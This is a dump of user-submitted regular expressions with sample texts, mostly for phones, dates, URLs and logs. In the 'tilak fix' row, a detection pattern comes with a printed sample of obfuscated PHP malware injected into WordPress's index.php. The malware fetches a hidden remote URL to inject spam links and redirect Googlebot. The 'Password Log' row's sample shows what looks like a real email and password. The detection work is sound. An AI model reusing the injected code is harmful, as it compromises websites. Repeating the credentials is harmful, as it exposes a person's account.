description
stringlengths 0
8.24k
| regex
stringlengths 1
26.3k
| text
stringlengths 0
2.47M
⌀ | title
stringlengths 1
150
| created_at
stringlengths 24
24
|
---|---|---|---|---|
Matches current mobile telephone numbers in Spain. | ^\+?(6\d{2}|7[1-9]\d{1})\d{6}$ | +795111111 | Spain mobile phone numbers | 2015-06-11T11:23:17.000Z |
insert[\s]+into[\s]+\([\s]*(?<columns>.*?)[\s]*\)[\s]+values[\s]+\((?<values>.*?)[\s]*\); | insert[\s]+into[\s]+\([\s]*(?<columns>.*?)[\s]*\)[\s]+values[\s]+\((?<values>.*?)[\s]*\); | insert into ( a, b, c ) values ( " insert into values (1,2,3)",1,2.3,"a,b" );
insert into (ee,bb,cc) values (aa,234,"asj",2.3); | SQL: insert into | 2015-07-25T10:57:48.000Z |
^(?:(?:31(\.)(?:0?[13578]|1[02]))\1|(?:(?:29|30)(\.)(?:0?[1,3-9]|1[0-2])\2))(?:(?:1[6-9]|[2-9]\d)?\d{2})$|^(?:29(\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)?(?:0[48]|[2468][048]|[13579][26])|(?:(?:16|[2468][048]|[3579][26])00))))$|^(?:0?[1-9]|1\d|2[0-8])(\.)(?:(?:0?[1-9])|(?:1[0-2]))\4(?:(?:1[6-9]|[2-9]\d)?\d{2})$ | 30.11.1983 | date dd.mm.yyyy | 2016-05-31T16:03:01.000Z |
|
jhkjnbkn | (\"(\\.|[^"])*\")|(\'(\\.|[^'])*\') | function jamel (a,b) { }
on the (favorit () )
on ( (jdjs), () ) (());
"sefsf sfsf '' sfsfsfsfs" "jslfksj slfkj on" 'sd \' sdfsfsf \' " sdfsf" fsfs' | kl | 2016-03-05T21:37:08.000Z |
.*?(\*)(.*?)(([\*@\$!~].*)|($)) | asdfasdf*uffa@ciao!mondo | URN, match blocchi | 2015-12-03T08:56:35.000Z |
|
^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\.){3}(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])$ | 123.232.12.23
| valid - IPv4 | 2017-09-28T14:53:39.000Z |
|
passes freecodecamp's telephone validator | ^(1\s?)?(\d{3}|\(\d{3}\))[\-\s]?\d{3}[\-\s]?(\d{4})$ | 555-555-5555
(555)555-5555
(555) 555-5555
555 555 5555
5555555555
1 555 555 5555 | telephone validator from FCC | 2021-04-02T20:53:03.000Z |
Check if HTTP Header of Public-Key-Pins has all nessery values for highest security | (((max-age=\d+)|(pin-sha256=\"[\d\w]+=?=?\"));\s{0,1})+includeSubDomains | pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="JbQbUG5JMJUoI6brnx0x3vZF6jilxsapbXGVfjhN8Fg="; max-age=300; includeSubDomains | Secure HTTP Header: Public-Key-Pins | 2015-08-10T12:33:29.000Z |
split URL in protokoll, domain, file(with path), parameter and anker | (?<protokoll>[a-z]*):\/\/?(?<domain>[a-z.-]*)?(?<file>[^?#]*)?[?](?<parameter>[^#]*)?[#](?<anker>.*)? | http://www.baumarkt.de/sub/kataloge.php?projekt=bm#start | get parts of URL | 2016-01-26T09:17:51.000Z |
Matches a password that has been passed in as a url query parameter or in a post dictionary. | (?<=pwd(?:=|:))[^&,\v]* | Sample text for testing:
abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ
0123456789 +-.,!@#$%^&*();\/|<>"'
12345 -98.7 3.141 .6180 9,000 +42
555.123.4567 +1-(800)-555-2468
foo@demo.net bar.ba@test.co.uk
www.demo.com http://foo.co.uk/
http://regexr.com/foo.html?q=bar&pwd=testPass!5903&user=userName
URL: https://www.zortssports.com/service/login?pwd=Csoil615&userId=coachaaronwsv%40gmail.com
Parameters: [userId: coachaaronwsv@gmail.com, pwd: Csoil615, last: Soil, first: Aaron]
URL: https://www.zortssports.com/service/login?&userId=coachaaronwsv%40gmail.com&pwd=Csoil615
Parameters: [userId: coachaaronwsv@gmail.com, pwd: Csoil615, first: Aaron] | Password Log | 2015-09-03T20:15:28.000Z |
Validating comma delimited strings for whitespaces & extra commas -- [^,\s]+(,([^,\s])+){0,} | [^,\s]+(,([^,\s])+){0,} | Validating comma delimited strings for whitespaces & extra commas | 2015-10-28T10:03:16.000Z |
|
(?<ModelCode>\w{1})\((?<CountryCode>\w{3,4})\)\-(?<ModelNumber>\w{2})(\-(?<StackerType>\w{2}))? (?<InterfaceType>ID003\-\d{2})v(?<SoftwareVersion>\d{3}\-\d{2}) (?<SotfwareDate>\w+) (?<Crc>\w{4}) | P(EUR)-07 ID003-04V201-63 08JUN10 14C0 | ID003 device info | 2014-03-12T09:38:20.000Z |
|
(?:https?:\/\/)?(?:www\.)?(?:[a-zA-Z0-9][-a-zA-Z0-9%_\+~#=]*\.)+[a-zA-Z][a-zA-Z0-9]{0,6}(?:/[a-zA-Z0-9_%+=~\-]+\.)*(?:#(?:[a-zA-Z][a-zA-Z0-9]+=[a-zA-Z0-9]*,)*(?:[a-zA-Z][a-zA-Z0-9]+=[a-zA-Z0-9]*))? | google.com/dreg...greg..ergtrg | link regex | 2020-04-30T16:19:45.000Z |
|
CREATE TABLE \x60(\w*)\x60 \(\n(.*?)^\) (.*?); | # ------------------------------------------------------------
CREATE TABLE `bkash_agent_incentive_status` (
`wallet_number` varchar(15) NOT NULL,
`created_by` bigint(20) DEFAULT NULL,
`updated_by` bigint(20) DEFAULT NULL,
`deleted_by` bigint(20) DEFAULT NULL,
`status` int(11) NOT NULL,
`comment` longtext,
`createdAt` datetime DEFAULT NULL,
`updatedAt` datetime DEFAULT NULL,
PRIMARY KEY (`wallet_number`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Dump of table bkash_barcodes
# ------------------------------------------------------------
CREATE TABLE `bkash_barcodes` (
`barcode_number` varchar(25) NOT NULL,
`created_by` bigint(20) DEFAULT NULL,
`updated_by` bigint(20) DEFAULT NULL,
`deleted_by` bigint(20) DEFAULT NULL,
`registered` tinyint(1) DEFAULT NULL,
`createdAt` datetime DEFAULT NULL,
`updatedAt` datetime DEFAULT NULL,
`created_email` varchar(50) DEFAULT NULL,
PRIMARY KEY (`barcode_number`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
| Parse tables in SQL Dump | 2018-12-19T17:53:08.000Z |
|
If you are sure none of the queries are relevant to your content, you can also remove all of them at once to have clean page paths. | \?.* | /geoinfo/weather/current/-83.442836,-214.974261?queryStringParameters=dddd&name1=sdasdas&queryStringParameters= | Remove all the query String | 2019-03-11T04:18:40.000Z |
Valida letras y palabras con acento | ^[a-zA-ZÀ-ÿ\u00f1\u00d1]+(\s*[a-zA-ZÀ-ÿ\u00f1\u00d1]*)*[a-zA-ZÀ-ÿ\u00f1\u00d1]+$ | Juan Álvarez | Validacion de palabras con acento | 2021-04-09T18:07:24.000Z |
teste | [a-z]+ | teste | teste | 2016-02-15T17:15:33.000Z |
Multiple emails seperated with comma allowed multiple dot ltds | ^([a-z][a-z0-9_.]+@([a-z0-9-]+\.)+[a-z]{2,6}(, )*)+$ | mail1@example.com, mail2@example.net, mail3@domain-name.co.uk, mail_4@example.fr, mail.5@example.org | Multiple emails seperated with comma | 2016-04-22T14:20:21.000Z |
^(?=.*?[A-Z])(?=.*?[a-z])(?!.*?[=?<>()'"\/\&]).{8,20}$ | Abscedsd
Ancbdj123
asjkQs23
asdfghjk
Asdfghj&
ashhgWhd=? | erferf | 2014-01-11T06:34:25.000Z |
|
This regular expression splits an address line like for example "1117 Franklin Blvd" into the street name and house number. It also supports addresses where street name and house number are the other way around (e.g. "Mustermannstr. 1"). Furthermore, this regular expression also supports address lines where additional information is given that is neither a street name nor a house number (e.g. "3940 Radio Road, Unit 110", "Pallaswiesenstr. 57 App. 235", "Suite 1500, 802 Docklands Street"). The regular expression has 8 capture groups in total. The first 4 capture groups get used when the house number precedes the street name. The names of these capture groups are prefixed with "A_". If the house number succeeds the street name, the last 4 capture groups are used. These are prefixed with "B_". | \A\s*
(?: #########################################################################
# Option A: [<Addition to address 1>] <House number> <Street name> #
# [<Addition to address 2>] #
#########################################################################
(?:(?P<A_Addition_to_address_1>.*?),\s*)? # Addition to address 1
(?:No\.\s*)?
(?P<A_House_number_1>\pN+[a-zA-Z]?(?:\s*[-\/\pP]\s*\pN+[a-zA-Z]?)*) # Street name
\s*,?\s*
(?P<A_Street_name_1>(?:[a-zA-Z]\s*|\pN\pL{2,}\s\pL)\S[^,#]*?(?<!\s)) # House number
\s*(?:(?:[,\/]|(?=\#))\s*(?!\s*No\.)
(?P<A_Addition_to_address_2>(?!\s).*?))? # Addition to address 2
| #########################################################################
# Option B: [<Addition to address 1>] <Street name> <House number> #
# [<Addition to address 2>] #
#########################################################################
(?:(?P<B_Addition_to_address_1>.*?),\s*(?=.*[,\/]))? # Addition to address 1
(?!\s*No\.)(?P<B_Street_name>\S\s*\S(?:[^,#](?!\b\pN+\s))*?(?<!\s)) # House number
\s*[\/,]?\s*(?:\sNo\.)?\s+
(?P<B_House_number>\pN+\s*-?[a-zA-Z]?(?:\s*[-\/\pP]?\s*\pN+(?:\s*[\-a-zA-Z])?)*|[IVXLCDM]+(?!.*\b\pN+\b))(?<!\s) # Street name
\s*(?:(?:[,\/]|(?=\#)|\s)\s*(?!\s*No\.)\s*
(?P<B_Addition_to_address_2>(?!\s).*?))? # Addition to address 2
)
\s*\Z | Corso XXII Marzo 69 | SPLIT ADDRESS LINE INTO STREET NAME AND HOUSE NUMBER | 2015-04-01T11:05:08.000Z |
.+HappyMK\s?(?<action>\S+)\s(?<chain>\w+):\sin:(?<int_in>\S+)\sout:(?<int_out>\S+), src-mac\s(?<src_mac>\S+),\sproto\s(?<prot>\w+)(\s(?<flags>\S+),|,)\s(?<src_ip>\b(?:\d{1,3}\.){3}\d{1,3}\b):(?<src_port>\d+)->(?<dest_ip>\b(?:\d{1,3}\.){3}\d{1,3}\b):(?<dest_port>\d+),(\s(?<NAT>\w+)\s\((?<src_nat_localip>\b(?:\d{1,3}\.){3}\d{1,3}\b):(?<src_nat_local_port>\d+)->(?<src_nat_public_ip>\b(?:\d{1,3}\.){3}\d{1,3}\b):(?<src_nat_public_port>\d+)\)->(?<dest_nat_ip>\b(?:\d{1,3}\.){3}\d{1,3}\b):(?<dest_nat_port>\d+),)?(\sprio\s(?<prio>\d+->\d+),)?\slen\s(?<len>\d+) | May 30 11:56:03 10.10.0.1 May 30 11:56:04 HappyMK Accept forward: in:bridge-vlan11 out:ether1-gateway, src-mac 60:c5:47:09:bd:c8, proto TCP (SYN), 10.11.0.251:58615->17.134.126.209:443, prio 1->0, len 64
May 30 11:55:29 10.10.0.1 May 30 11:55:29 HappyMK Accept forward: in:vlan10 out:ether1-gateway, src-mac 00:60:6e:a5:61:c1, proto UDP, 10.10.0.14:62164->157.56.106.184:3544, NAT (10.10.0.14:62164->89.141.65.84:62164)->157.56.106.184:3544, len 84
May 30 11:56:25 10.10.0.1 May 30 11:56:26 HappyMK Accept forward: in:vlan10 out:ether1-gateway, src-mac 00:60:6e:a5:61:c1, proto UDP, 10.10.0.14:62164->157.56.106.189:3544, len 84
| mikrotik | 2016-03-22T01:32:32.000Z |
|
Possible Formats:
N8X 3T7
N8X
80021
80021-1234 | ^(\d{5}(-\d{4})?|[A-CEGHJ-NPRSTVXY]\d[A-CEGHJ-NPRSTV-Z]
?\d[A-CEGHJ-NPRSTV-Z]\d|[A-CEGHJ-NPRSTVXY]\d[A-CEGHJ-NPRSTV-Z])$ | US and Canadian Zip Code Validator | 2016-08-29T20:20:08.000Z |
|
(€)(\w*)[.]?(\w*) | €11.99
€99 | Replace euro symbol to WW | 2017-12-07T10:29:27.000Z |
|
.{1,}?([。.」??!!]+|\n) | そこは純白の空間だった。
四方の壁は継ぎ目の無い白塗り、中央に鎮座する祭壇も雪を固めたように真っ白で、この部屋を満たす光もまた白く輝いていた。
「供物を捧げよ」
どこからとも無く部屋中に響き渡る声。
開け放たれた両開きの扉、その暗い通路の向こうから人の列がやってくる。白い部屋と同じように、その人々もまた白尽くめであった。
染み一つ無い清潔な白いローブで全身を覆い、顔には白いマスクを被り、素肌を露出している部分が一切無い。 | Tokenize japanese sentences | 2018-08-11T17:25:01.000Z |
|
"middle" and "middle2" can be any text | head-(?'BRAND'Бренд)?+(?'middle'(?:(?!Артикул|tail).)*+)(?'CODE'Артикул)?+(?'middle2'(?:(?!tail).)*+)tail | head-Бренд-middle-Артикул-middle2-tail | Two groups between text | 2017-07-17T00:08:07.000Z |
^[A-Z]{1}[0-9]*$ | 1 A-Z, unlimited numbers | 2019-09-05T17:01:09.000Z |
||
(\\?\\"?|\\?'?)sheet(\\?\\"?|\\?'?)! | \"sheet\"!cell | Spreadsheet sheet reference | 2017-06-28T04:03:06.000Z |
|
core\.\d* | 303488 -rw------- 1 oagmgr oinstall 596971520 May 10 15:54 core.10081
271392 -rw------- 1 oagmgr oinstall 543047680 Aug 16 09:59 core.1708
310616 -rw------- 1 oagmgr oinstall 621223936 Jul 29 09:05 core.21813
261296 -rw------- 1 oagmgr oinstall 524054528 Sep 4 08:29 core.25532
292500 -rw------- 1 oagmgr oinstall 469028864 Jun 25 19:45 core.32008
291580 -rw------- 1 oagmgr oinstall 600080384 Jul 11 22:08 core.7981
365072 -rw------- 1 oagmgr oinstall 484425728 Jun 2 14:08 core.8238
24 -rw-r--r-- 1 oagmgr oinstall 23606 Aug 16 09:59 hs_err_pid1708.log
24 -rw-r--r-- 1 oagmgr oinstall 23436 Apr 4 21:19 hs_err_pid18984.log
24 -rw-r--r-- 1 oagmgr oinstall 23421 Sep 4 08:29 hs_err_pid25532.log
24 -rw-r--r-- 1 oagmgr oinstall 23497 Jul 11 22:08 hs_err_pid7981.log
24 -rw-r--r-- 1 oagmgr oinstall 24080 Jun 2 14:08 hs_err_pid8238.log | jvm core dump grab | 2017-09-05T15:44:19.000Z |
|
^\/(?:products|branche|industry)\/?(.*) | /products/
/products/retail/
/products/onsite/
/branche//
/branche/retail
/branche/onsite/
/industry/
/industry/retail
/industry/onsite/
/industry/restaurant/ | kassasysteem | 2016-07-04T21:49:37.000Z |
|
I need to match a pattern as follows with the added limitation that the match must be exactly 7 characters long:
/^\d*[a-zA-Z]\d*$/
In words, this is a 7 character sequence of 6 digits and one alphabetic character in any order.
How do I limit the overall length to 7 using regex?
Thanks!
| ^\s*\d*[a-zA-Z]\d*\s*$ | How to limit total number of characters of match | 2015-01-15T19:56:40.000Z |
|
Find single dollar delimited LaTeX equations, for use with e.g. KateX | (?<![\$])\$([^$]+)\$(?!\$) | This is $ some $ regex $$ testing $$ | Single dollar delimited LaTeX equation | 2014-09-18T15:20:35.000Z |
This one removes ALL attributes if "style" is found. See my other expression to only remove the style. | \<(\w+)\s[^>]*?style=([\"|\']).*?\2\s?[^>]*?(\/?)> | div' is a draw:frame.
--><div style="height:2.818cm;width:26.67cm; padding:0; " class="P9"><p><img src="" /></p></div><!--Next '
div' is a draw:frame.
--><div style="height:2.086cm;width:19.05cm; padding:0; " class="P9"><p><img src="" /></p></div><!--Next '
div' is a draw:frame.
--><div style="height:3.303cm;width:25.21cm; padding:0; " class="P9"><p><img src="" /></p></div><!--Next '
div' is a draw:frame.
--><div style="height:0.949cm;width:15.864cm; padding:0; " class="P9"><p><img src="" /></p></div></div><div style="clear:both; line-height:0; width:0; height:0; margin:0; padding:0;"> </div><!--Next 'div' was a 'draw:page'.--><div id="page5" class="dp3"> <!--Next '
div' is a draw:frame.
--><div style="height:3.255cm;width:25.197cm; padding:0; " class="P4"><!--Next 'div' was a 'draw:text-box'.--><div style=""><ol><li><p style="margin-left:0cm;"><span style="display:block;float:left;min-width:0cm"><!-- --></span>Account Performance YoY Revenue<span class="odfLiEnd"/> </p></li></ol></div></div><!--Next '
div' is a draw:frame.
--><div style="height:5.715cm;width:24.306cm; padding:0; " class="P9"><p><img src="" /></p></div><!--Next '
div' is a draw:frame.
--><div style="height:4.251cm;width:24.13cm; padding:0; " class="P9"><p><img src="" /></p></div></div><div style="clear:both; line-height:0; width:0; height:0; margin:0; padding:0;"> </div><!--Next 'div' was a 'draw:page'.--><div id="page6" class="dp3"> <!--Next '
div' is a draw:frame.
--><div style="height:1.839cm;width:25.197cm; padding:0; " class="P4"><!--Next 'div' was a 'draw:text-box'.--><div style=""><ol><li><p style="margin-<span style="display:block;float:left;min-width:0cm"><!-- --></span>Top Level Statistics - YTD<span class="odfLiEnd"/> </p></li></ol></div></div><!--Next '
div' is a draw:frame.
--><div style="height:17.145cm;width:25.197cm; padding:0; " class="P4"><!--Next 'div' was a 'draw:text-box'.--><div style=""><ol><li><p style="margin-left:0cm;"><span style="display:block;float:left;min-width:0cm"><!-- --></span>Total Campaigns (all): 40<span class="odfLiEnd"/> </p></li><li><p style="margin-left:0cm;"><span style="display:block;float:left;min-width:0cm"><!-- --></span>Total Ad Groups: 107<span class="odfLiEnd"/> </p></li><li><p style="margin-left:0cm;"><span style="display:block;float:left;min-width:0cm"><!-- --></span>Top Performing Campaigns ROI<span class="odfLiEnd"/> </p></li></ol><ul><li><ol><li><p style="margin-left:0cm;"><span style="display:block;float:left;min-width:0cm"><!-- --></span>GSN Orchid Brand: $11,491.30, Yield $149,532 (ROI = 1300%)<span class="odfLiEnd"/> </p></li><li><p style="margin-left:0cm;"><spa | Remove / delete / strip style attribute from html tags | 2015-07-03T22:32:07.000Z |
With working parenthesis ! | ^((?:0|0033|\+33)[1-9])((?:[-_. ]?)[0-9]{2})((?:[-_. ]?)[0-9]{2})((?:[-_. ]?)[0-9]{2})((?:[-_. ]?)[0-9]{2})$ | 0604038164 | French telephone number | 2016-02-29T14:50:03.000Z |
http(?:s)?:\/\/(?:www\.)?twitter\.com\/([a-zA-Z0-9_]+) | <!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>R A Haddon - Freelance IT Specialist</title>
<link rel="stylesheet" type="text/css" href="css/styles.css" />
<link rel="shortcut icon" href="http://faviconist.com/icons/a6b8f33ac0d570912840c1c08e741adf/favicon.ico" />
<meta name="trustpilot-one-time-domain-verification-id" content="5zHusBjE6OGxIen0ANHlIC8FaIHoDRHrhMjQmKmd"/>
<body>
<div id="main_wrapper">
<div id="topnav">
<div class="linkcontrol">
<li> <a href="https://plus.google.com/u/0/118235338769933415572" target="_blank">+Ryan Haddon</a></li>
<li><a href="res/CV2016.pdf">CV</a></li>
<li><a href="http://www.newgrounds.com/portal/view/598703">Animation</a></li>
<li><a href="https://www.facebook.com/ryan.haddon" target="_blank">Facebook</a></li>
<li><a href="https://twitter.com/breakworm" target="_blank">Twitter</a></li>
<li><a href="http://www.linkedin.com/in/ryanhaddon" target="_blank">Linked In</a></li>
<li> <a href="http://pph.me/rhaddon" target="_blank">People Per Hour</a></li>
<li><a href="http://breakworm.newgrounds.com/" target="_blank">Newgrounds</a></li>
</div>
</div>
<header>
<div class="mainheader">
<div class="titlecontainer">
<div class="logo"></div>
<div class="itspeciallogo"></div>
</div>
</div>
</header>
<nav></nav>
<div id="content_wrapper">
<div id="medialinks">
<a href="https://www.facebook.com/ryan.haddon" target="_blank"><img src="images/icons/fb.png" width="75" height="75" alt="facebook"></a>
<a href="https://twitter.com/breakworm" target="_blank"><img src="images/icons/twit.png" width="75" height="75" alt="twitter"></a>
<a href="http://www.linkedin.com/in/ryanhaddon" target="_blank"><img src="images/icons/linkedin.png" width="75" height="75" alt="LinkedIn"></a>
<a href="http://pph.me/rhaddon" target="_blank"><img src="images/icons/pph.png" width="75" height="75" alt="pph"></a>
<a href="https://plus.google.com/u/0/118235338769933415572" target="_blank"><img src="images/icons/gplus.png" width="75" height="75" alt="gplus"></a>
<a href="http://breakworm.newgrounds.com/" target="_blank"><img src="images/icons/ng.png" width="75" height="75" alt="newgrounds"></a> </div>
<div id="contentbox">
<article>
<figure style="float: left;">
<div class="main_fig">
<img src="images/meFace.jpg" width="138" height="170" alt="Rahaddon">
</div>
</figure>
<div style="">
“A positive, proactive hard working team member with a great ability to learn quickly. Demonstrating self initiative & knowledge being applied directly to the task at hand . Possesses excellent interpersonal, communication and customer service skills. Enjoys being part of a successful and productive team whilst demonstrating strong leadership potential in multiple highly competitive and demanding industry sectors. Proven ability to manage and complete projects to the highest standard. Accurate attention to detail and within agreed deadlines.”
</div>
<figure>
<div class="centre_fig">
<object type="application/x-shockwave-flash"
data="media/screenShow.swf"
width="640" height="360">
<param name="movie" value="music/sound.swf" />
<param name="quality" value="high"/>
</object>
<div class="fig_link"></div>
</div>
</figure>
</article>
</div>
</div>
</section>
<section>
<div id="content_wrapper">
<div id="medialinks">
</div>
<div id="contentbox">
<article>
<h3>Knowledge, Training & Experience with the following:- </h3><br/>
<p><b>Operating Systems</b></p>
<img src="images/companylogos/1857.png" width="64" height="64" alt="Android">
<img src="images/companylogos/1211779562.png" width="64" height="64" alt="Apple"> <img src="images/companylogos/ubuntulogo.png" width="128" height="40" alt="Ubuntu">
<img src="images/companylogos/windows-8-logo.png" width="104" height="64" alt="Windows 8">
<p><b> Application Development Platforms</b></p>
<img src="images/companylogos/java.png" width="48" height="84" alt="Java">
<img src="images/companylogos/net.jpg" width="128" height="64" alt="dotNET">
<img src="images/companylogos/xml.png" width="64" height="64" alt="xml">
<p><b> Web Development Platforms</b></p>
<img src="images/companylogos/html5.png" width="64" height="64" alt="Html5">
<img src="images/companylogos/css3.png" width="50" height="64" alt="CSS3">
<img src="images/companylogos/javascript.png" width="64" height="64" alt="JavaScript"><img src="images/companylogos/jquery.png" width="164" height="64" alt="jQuery">
<img src="images/companylogos/php.png" width="128" height="64" alt="Php">
<img src="images/companylogos/ajax.png" width="128" height="64" alt="AJax">
<p><b> Database Management Systems</b></p>
<img src="images/companylogos/ORACLE-Logo.jpg" width="128" height="32" alt="Oracle">
<img src="images/companylogos/Mysql.png" width="128" height="64" alt="mySQL">
<p><b> Adobe Packages</b></p>
<img src="images/companylogos/Adobe_Dreamweaver_CS6_Icon.png" width="64" height="64" alt="Adobe Dreamweaver"><img src="images/companylogos/Adobe_Photoshop_CS5_icon.png" width="64" height="64" alt="Adobe Photoshop">
<img src="images/companylogos/illustrator_cs5_mnemonic_no_shadow_png.png" width="64" height="64" alt="Adobe Illustrator">
<img src="images/companylogos/Adobe_Flash_Professional_CS5_icon.png" width="64" height="64" alt="Adobe Flash">
<img src="images/companylogos/fireworks-logo.png" width="64" height="64" alt="Adobe Fireworks">
<img src="images/companylogos/Adobe_Premiere_Pro_CS5_icon_(2).png" width="64" height="64" alt="Adobe Premier Pro">
<img src="images/companylogos/after_effects_cs5_mnemonic_no_shadow_png.png" width="64" height="64" alt="Adobe After Effects">
<p><b> Addtional Software Packages</b></p>
<img src="images/companylogos/Office03.png" width="164" height="64" alt="Micrsoft Office Application">
<img src="images/companylogos/VMware_Workstation_7_logo.png" width="64" height="64" alt="VMware Logo">
<img src="images/companylogos/index.jpg" width="164" height="64" alt="VMware"></article>
</div>
</section>
</div>
</body>
</html>
| HTML | 2018-09-20T11:23:51.000Z |
|
^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*(\$\w+)=\@\$_server\[['"]http_host['"]\];\1.{0,90}?if\(\@\$_get\[["']merdo["'\]\)\{\w\s'\<\!\-]+sysadmin.{0,180}?curl_setopt\(\$.{0,370}?file_get_contents\(\$.{0,150}?$\w{0,21}=\@json_decode\(str_rot13\(.{0,460}?\$\w.{0,21}\[["']html.{0,550}?\$myurl=rtrim\(\$\w.{0,21}\[['"]links.{0,110}header\(['"]location:\s*["']\.\$url.{0,100}?\)\.['"]\?merdo=.{0,140}?\);(?:[^>]+>\s*)?(?=\s*<\?(?:php)?) | <?php $eMaOCtmXlSnImjmiCMmP=@$_SERVER["HTTP_HOST"];$eMaOCtmXlSnImjmiCMmP=str_replace('www.','',$eMaOCtmXlSnImjmiCMmP);if(@$_GET["merdo"]){echo '<!--SYSADMIN-->';exit();}function mMvIxjRKghDOytsXmHGz($WDqgjhajdhXeSWcZQBrY){if(function_exists('curl_init')){$JFOvIQnSKOvIvanRszDQ=curl_init();curl_setopt($JFOvIQnSKOvIvanRszDQ,CURLOPT_URL,$WDqgjhajdhXeSWcZQBrY);curl_setopt($JFOvIQnSKOvIvanRszDQ,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($JFOvIQnSKOvIvanRszDQ,CURLOPT_RETURNTRANSFER,true);curl_setopt($JFOvIQnSKOvIvanRszDQ,CURLOPT_USERAGENT,"RaBot");curl_setopt($JFOvIQnSKOvIvanRszDQ,CURLOPT_TIMEOUT,10);return curl_exec($JFOvIQnSKOvIvanRszDQ);}else{return file_get_contents($WDqgjhajdhXeSWcZQBrY);}}function authRQaFMJbNLaJvrLTF($SMKstKjPCEdudocSCHHm){global $mnTIeyfFkNxHxpHFcEse;$DkiJvJYOhXiunDLZIogN=@json_decode(str_rot13($SMKstKjPCEdudocSCHHm),true);if($DkiJvJYOhXiunDLZIogN["type"]=="link"||$DkiJvJYOhXiunDLZIogN["type"]=="anti"){if(count($DkiJvJYOhXiunDLZIogN["links"])){$XxXBDNFNLjLqzmBZbKRY='';foreach($DkiJvJYOhXiunDLZIogN["links"]as $AXzHJsVXmlVXbzpqVwQJ){$XxXBDNFNLjLqzmBZbKRY.="<a href=\"".$AXzHJsVXmlVXbzpqVwQJ["url"]."\" title=\"".$AXzHJsVXmlVXbzpqVwQJ["title"]."\">".$AXzHJsVXmlVXbzpqVwQJ["baslik"]."</a>\n";}$SmkbvCeraMrwNwvcAesM=$DkiJvJYOhXiunDLZIogN["html"];$SmkbvCeraMrwNwvcAesM=str_replace('{LINK_CODE_REPLACE}',$XxXBDNFNLjLqzmBZbKRY,$SmkbvCeraMrwNwvcAesM);echo $SmkbvCeraMrwNwvcAesM;}else{$SmkbvCeraMrwNwvcAesM=$DkiJvJYOhXiunDLZIogN["html"];$SmkbvCeraMrwNwvcAesM=str_replace('{LINK_CODE_REPLACE}','',$SmkbvCeraMrwNwvcAesM);echo $SmkbvCeraMrwNwvcAesM;}}elseif($DkiJvJYOhXiunDLZIogN["type"]=="redirect"){if(@preg_match('#google#',$_SERVER["HTTP_USER_AGENT"])){$uri=$_SERVER['REQUEST_URI'];$rand_keys=array_rand($DkiJvJYOhXiunDLZIogN["links"],1);$myurl=rtrim($DkiJvJYOhXiunDLZIogN["links"][$rand_keys]["url"],'/');$url=$myurl.$uri;header('HTTP/1.1 301 Moved Permanently');header('Location: '.$url.'');exit();}}}$VIsQtYtIlNsuLPcxywSQ=str_rot13('uggc://jjj.wnxxryyl.pbz/kynetr.cuc').'?merdo='.$eMaOCtmXlSnImjmiCMmP;$zEGHtEUrCiJBSXWxYOdV=mMvIxjRKghDOytsXmHGz($VIsQtYtIlNsuLPcxywSQ);authRQaFMJbNLaJvrLTF($zEGHtEUrCiJBSXWxYOdV); ?> <?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
| tilak fix | 2020-04-15T12:22:48.000Z |
|
([A-Za-z\'\-]++)([\.\,\?\!\:\;]+) | CHAPTER XXII ON THE TRAIL Tue Ludding House was on the side street of the town, about three blocks from the hotel at which our friends were stopping. When the two Rovers arrived there they found the din- ing-room had just closed and only two men and an elderly woman were in sight. “We are looking for a man who was around here—I think his name was Blackie Crowden,” said Sam. “He is a man who 'tain't, stutters very badly.” “Oh, yes, I remember that fellow,” returned one of the men who worked around the hotel, “He was here for lunch.” “Can you tell me where he is now?” “No, I cannot.” “That man who stuttered so terribly said something about going to Stockbridge,” put in the woman's. “Perhaps long-bow, he was going there.” “On foot?” “I don’t think so. Most likely he took the stage. That left about ten minutes ago.” | Example 1 - Separation of Word from Punctuation | 2018-04-21T13:01:14.000Z |
|
parse option symbol | (\D+)(\d+)(\D)(\d+) | V230630C00200000
COIN230630C00020000
TSLA230818P00025000
SPXS230630C00019000
| Options symbol parse | 2023-06-13T18:29:04.000Z |
Parse "ipconfig /all" output and grab all MAc Adresses. | ([[:blank:]][[:xdigit:]]{2}-[[:xdigit:]]{2}-[[:xdigit:]]{2}-[[:xdigit:]]{2}-[[:xdigit:]]{2}-[[:xdigit:]]{2})$ | Windows-IP-Konfiguration
Hostname . . . . . . . . . . . . : tarox
Primäres DNS-Suffix . . . . . . . :
Knotentyp . . . . . . . . . . . . : Hybrid
IP-Routing aktiviert . . . . . . : Nein
WINS-Proxy aktiviert . . . . . . : Nein
Ethernet-Adapter Bluetooth-Netzwerkverbindung:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : Bluetooth-Gerät (PAN)
Physikalische Adresse . . . . . . : 00-25-D3-B7-CF-FE
DHCP aktiviert. . . . . . . . . . : Ja
Autokonfiguration aktiviert . . . : Ja
Ethernet-Adapter OpenVPN frenzy:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : TAP-Windows Adapter V9 #2
Physikalische Adresse . . . . . . : 00-FF-BE-A2-27-2D
DHCP aktiviert. . . . . . . . . . : Ja
Autokonfiguration aktiviert . . . : Ja
Ethernet-Adapter OpenVPN megatron:
Medienstatus. . . . . . . . . . . : Medium getrennt
Verbindungsspezifisches DNS-Suffix:
Beschreibung. . . . . . . . . . . : TAP-Windows Adapter V9
Physikalische Adresse . . . . . . : 00-FF-5B-6B-65-09
